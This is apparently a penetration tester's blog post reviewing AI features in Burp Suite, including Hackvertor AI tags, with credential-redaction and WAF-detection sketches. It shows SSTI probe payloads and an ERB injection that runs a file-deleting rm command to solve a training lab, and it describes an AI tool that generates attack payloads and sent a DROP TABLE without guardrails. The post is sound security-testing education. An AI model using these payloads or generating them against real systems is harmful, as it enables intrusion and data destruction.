One of my favourite extensions is the "Content Type Converter". It's great for checking whether a web application accepts both JSON and XML for requests, and can be really useful for finding weird vulnerabilities when the application attempts to parse unexpected data formats. I won't stop using it as a result of the tag I'm about to show, but I think it's a really nice way to demonstrate the potential of this tool and how quickly something can be *mostly* achieved with Hackvertor AI. I've given it the following prompt:

Let’s try it out! As you can see below, the conversion from JSON to XML was not bad at all.

We can also try to convert it to “application/x-www-form-urlencoded” and see if it understands it, just by adding it into the format parameter:

How about YAML?

Finally, it got SOAP pretty close too.

Again, I think in each stage, it got the general gist of what we wanted. I think this is extremely impressive to have spun up in less than 10 minutes and could definitely be something incorporated into a scripted workflow, or as part of another extension.

SSTI Format Modification

Finally, before we jump into some of the other features, I often find myself going down the HackTricks list of payloads trying to find a valid SSTI test payload when I believe I have control over a template injection issue. How about if Hackvertor AI could just generate it for me, if I know the backend?

Rather than bombard you with more images, here is a summary of the results:

Tag format:

<@_ssti_format('1.0','<engine>','55d678b92ea4742f25c51f8c54593360')>7*7</@_ssti_format>

Engine (Argument)  | Result      | Validity
razor              | @{7*7}      | Correct
pugjs              | #{7*7}      | Correct
NUNJUCKS           | {{ 7 * 7 }} | Correct
erb (ruby)         | <%= 7*7 %>  | Correct
tornado            | {{ 7*7 }}   | Correct
mojolicious        | <%= 7*7 %>  | Correct
twig               | {{7*7}}     | Correct
freemarker (java)  | ${7*7}      | Correct
jinja2             | {{ 7*7 }}   | Incorrect (causes an error)
asp                | {{ 7*7 }}   | Incorrect

Finally, just for a bit of fun, I wanted to see if I could create a tag to find the SSTI payload to the first PortSwigger SSTI lab. The prompt I gave my tags can be seen below:

The challenge requires us to delete a file – “/home/carlos/morale.txt” – using a Ruby (ERB) SSTI. The correct payload will be:

  • <%= system("rm /home/carlos/morale.txt") %>

The following input was provided:

Help me delete the file at /home/carlos/morale.txt. The templating engine in use is Ruby ERB.

The output can be seen in the image below, in which it suggests using the "File.delete" function.

Let’s see it working in Repeater. I entered my message in the request:

Then I highlighted it, right-clicked, and used the Hackvertor menu to wrap it in my new "ssti_pwn" tag.

Finally, I right-clicked on the request, went to the Hackvertor option, and clicked "Convert Tags" to have the payload generated. This resulted in the same payload as before:

I URL encoded it (but we could also get the prompt to do that) and sent it. The lab just returned a “1”…

But when I sent it again, it looked solved 😊

And there we have it: creating an AI tag with Hackvertor to perform an SSTI attack for us based on our natural language input. You can't tell me you don't find that cool; this tech is mind-boggling sometimes!

Auto Tag Generators

Another component that caught my eye from the release video was the automatic generation of tags based on input from Repeater. This has to be explicitly enabled (we ticked it when we were in the Hackvertor settings).

I'll preface this by saying I don't feel comfortable sending a whole Repeater request to AI systems, as it often contains some form of credential material. The other features we've examined so far only send selected portions of data to BurpAI, which I'm relatively comfortable with from a privacy, anonymity, and security perspective.
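If you do want to experiment with features like this, one cheap mitigation is to strip credential-bearing headers before anything leaves Burp. The helper below is hypothetical, my own sketch rather than anything Hackvertor does for you today:

```java
import java.util.regex.Pattern;

public class PromptRedactor {
    // Headers that commonly carry credential material (extend to suit your target)
    private static final Pattern SENSITIVE =
            Pattern.compile("(?im)^(Cookie|Authorization|X-Api-Key):.*$");

    static String redact(String rawRequest) {
        return SENSITIVE.matcher(rawRequest).replaceAll("$1: [REDACTED]");
    }

    public static void main(String[] args) {
        String req = "GET /?q=%41%42 HTTP/1.1\nHost: example.com\nCookie: session=abc123\n";
        System.out.println(redact(req)); // Cookie value replaced before the request is shared
    }
}
```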

But alas, let's have a quick look at what it might do for you if you have this enabled. I sent the following GET request about 5 times to Repeater:

In the extensions tab, I noticed some output from the Hackvertor tool. Here is an extract:

I sincerely apologize for that ugly block of text, but I think it's a pretty interesting insight. We can see that it sent the whole request (including cookies ☹) over to the AI service, which correctly identified that there was a URL-encoded parameter in the GET request. The prompt then automatically ends with a JSON object containing instructions. Following that, some "CodeConversions" were run:

The resulting Hackvertor tags are then available in my UI, without me ever creating them:

Whilst this is undoubtedly a very intelligent feature, I'm struggling to see the use cases where background automation is beneficial here. I guess if there were fields in the request that you assumed were not decodable (NEVER ASSUME!!!) then perhaps this would be useful. Or maybe it would just be quicker than sorting it manually. Either way, I think a better approach would be to send just a part of a request from Repeater to have a decoder tag created for it. For example, in the same way you can highlight part of a request and send it for Active Scanning, you could highlight the encoded part of a request and have a "Create AI Decoding Tags" option for it. For me, that would have more applicability, but your mileage may vary, and maybe I've not considered a use case!

Use AI to Generate Code

Finally, you can now use the same custom tag AI components to create code for performing actions on tags explicitly. For example, let’s say I wanted a tag that, when wrapped around a number, would give me the square of that number, multiplied by 1337. In the “Create custom tag” UI, I’d select a name for my tag, then also select a language. I chose JavaScript in this example.

Then we just click on the “Use AI to Generate Code” button, enter a test input and an expected output, and finally end up with something resembling this:

I’ll save that tag, and now whenever I want to perform my 1337 math operation on an integer, I’ll just wrap those tags around it. I don’t think that’s overly useful, but the concept is there, and you can expand on it how you wish.
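For reference, the generated logic boils down to something like the snippet below (my tag came back in JavaScript; this is the equivalent expressed in Java to match the other examples in this post):

```java
public class LeetMath {
    // Square the wrapped number, then multiply by 1337
    static long convert(String wrappedInput) {
        long n = Long.parseLong(wrappedInput.trim());
        return n * n * 1337;
    }

    public static void main(String[] args) {
        System.out.println(convert("4")); // 21392
    }
}
```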

Ramblings v2

Overall, I can definitely see the applicability of the prompted AI tag generation and believe that it will be the most useful feature for me and my workflow. Furthermore, when there are complex mathematical encoding/decoding or encryption/decryption routines that I need to make tags for, the new AI code generator will definitely come in handy. The fact we can now generate these from scratch, directly in Burp's UI, is such a game changer. Over time, as we (as security professionals) continue to learn, improve this technology, and incorporate it into our workflows, I believe the cumulative gains will start to compound in terms of both testing quality and efficiency.

Concluding Thoughts

Well, there we have it. Today, we introduced two new AI features of PortSwigger's Burp Suite in the "Early Adopter" build. We pitted Shadow Repeater against some known-exploitable labs and tried to identify where it works best. We then had a look at the new AI-powered Hackvertor, which we used to create some cool conversions and solve some basic CTF challenges. Whilst these were very quick, high-level examinations, we were still able to draw some interesting conclusions, and hopefully they gave you some ideas for how you can incorporate these features into your workflow.

As with most new technologies, there are naturally some great points and some not-so-great points. My biggest concern around AI has been (and always will be) its unpredictability. Seeing a DROP TABLE command sent by Shadow Repeater was a little terrifying, but that also encouraged me to review the prompt currently in place from the fantastic folks over at PortSwigger:

https://github.com/PortSwigger/shadow-repeater/blob/325e438bfadd0ac5bb8e9f280d521f481ffd81d2/src/main/java/burp/shadow/repeater/ai/VariationAnalyser.java#L36

As you can see, there are no guardrails in place along the lines of "do not send anything that could change the state of a backend component, such as a modifying SQL statement". Being able to make your own adjustments based on what you are testing would be a welcome addition. Better yet, perhaps I'll try to work out how to create a UI that lets me add and remove components from the prompt on the fly. This could enhance testing if we could add a "focus on identifying unusual encodings and differences in parser responses" line for a specific endpoint, without having to recompile the extension. I'm not sure what that looks like in reality, but it's on my TO-DO list for now.

Furthermore, I think there are some cool opportunities here from a detection perspective for Shadow Repeater. I primarily focus on internal network assessments, and Endpoint Detection and Response (EDR) has taken great strides over the past few years to specifically be able to identify potentially malicious behavior based on patterns. An example is a program calling an API to allocate some memory, then an API to write to that memory, then an API to make that memory executable, before a final API to execute code from somewhere in that memory region.

I think a similar approach can be applied to Shadow Repeater: each invocation initially orientates itself with a 4-character request, then two 6-character requests, before sending an 8-character request. These requests, less than a second apart and from the same source IP, could be an indicator of someone having Shadow Repeater running while browsing your application. Maybe that's far-fetched, but it was just an idea. EDRs love a pattern… do WAFs?
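As a thought experiment, a detection rule for that orientation fingerprint might look like the sketch below. The event fields are illustrative, and the growing 4-to-8 character lengths are simply the pattern observed throughout this post:

```java
import java.util.List;

public class ShadowRepeaterDetector {
    // One parsed log entry per probe against a parameter (illustrative fields)
    record ProbeEvent(String sourceIp, String param, int valueLen, long epochMillis) {}

    // Flags a sliding window of three probes whose values grow from 4 to 8
    // characters (e.g. 4, 6, 6, 8), from the same source against the same
    // parameter, within one second of each other.
    static boolean matchesOrientation(List<ProbeEvent> events) {
        for (int i = 0; i + 2 < events.size(); i++) {
            ProbeEvent a = events.get(i), b = events.get(i + 1), c = events.get(i + 2);
            boolean growingShortProbes = a.valueLen() >= 4 && c.valueLen() <= 8
                    && a.valueLen() <= b.valueLen() && b.valueLen() <= c.valueLen()
                    && a.valueLen() < c.valueLen();
            boolean sameSource = a.sourceIp().equals(b.sourceIp())
                    && b.sourceIp().equals(c.sourceIp())
                    && a.param().equals(c.param());
            boolean fast = c.epochMillis() - a.epochMillis() < 1_000;
            if (growingShortProbes && sameSource && fast) return true;
        }
        return false;
    }
}
```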

Finally, to answer my own question from earlier regarding credits. After playing with these features and writing this post, I used about 1665 credits, which equates to about $0.8325. This was somewhat surprising to me. I suspect that the bulk was from Hackvertor, as I presume this uses more tokens than Shadow Repeater, especially when whole requests are being sent for analysis. You can check your remaining credits within your PortSwigger dashboard, as seen below:

Or, in the bottom right corner of the Burp Suite UI:

Overall, the new features are just the tip of the iceberg. If I know anything about the team at PortSwigger, these will be followed by some innovative and novel ideas that end up blowing my tiny little brain. I look forward to seeing the improvements made to these specific features, and the BurpAI ecosystem in general, but overall, I think it’s starting off in a great place and has huge potential upsides.

Whether you are a web application tester keen to learn about the new features, a bug bounty hunter perfecting their trade, or a network tester trying to improve at web application hacking, I hope you took some value from this blog post. If you are reading this as a concerned sysadmin or CISO, feel free to get in touch and we can help you solve your security headaches.

Keep an eye out for another post soon where we'll go through the process of writing a basic extension with AI features, integrated with the Montoya API. Until then, I'd recommend checking out some of the other blogs on our site, such as Josiah's introduction to browser hacking and v8 vulnerabilities, Tom's dive into abusing misconfigured Active Directory Certificate Services, or our director Alex's look into how attackers can use temporary credentials to attack AWS environments.

Finally, happy hacking!😊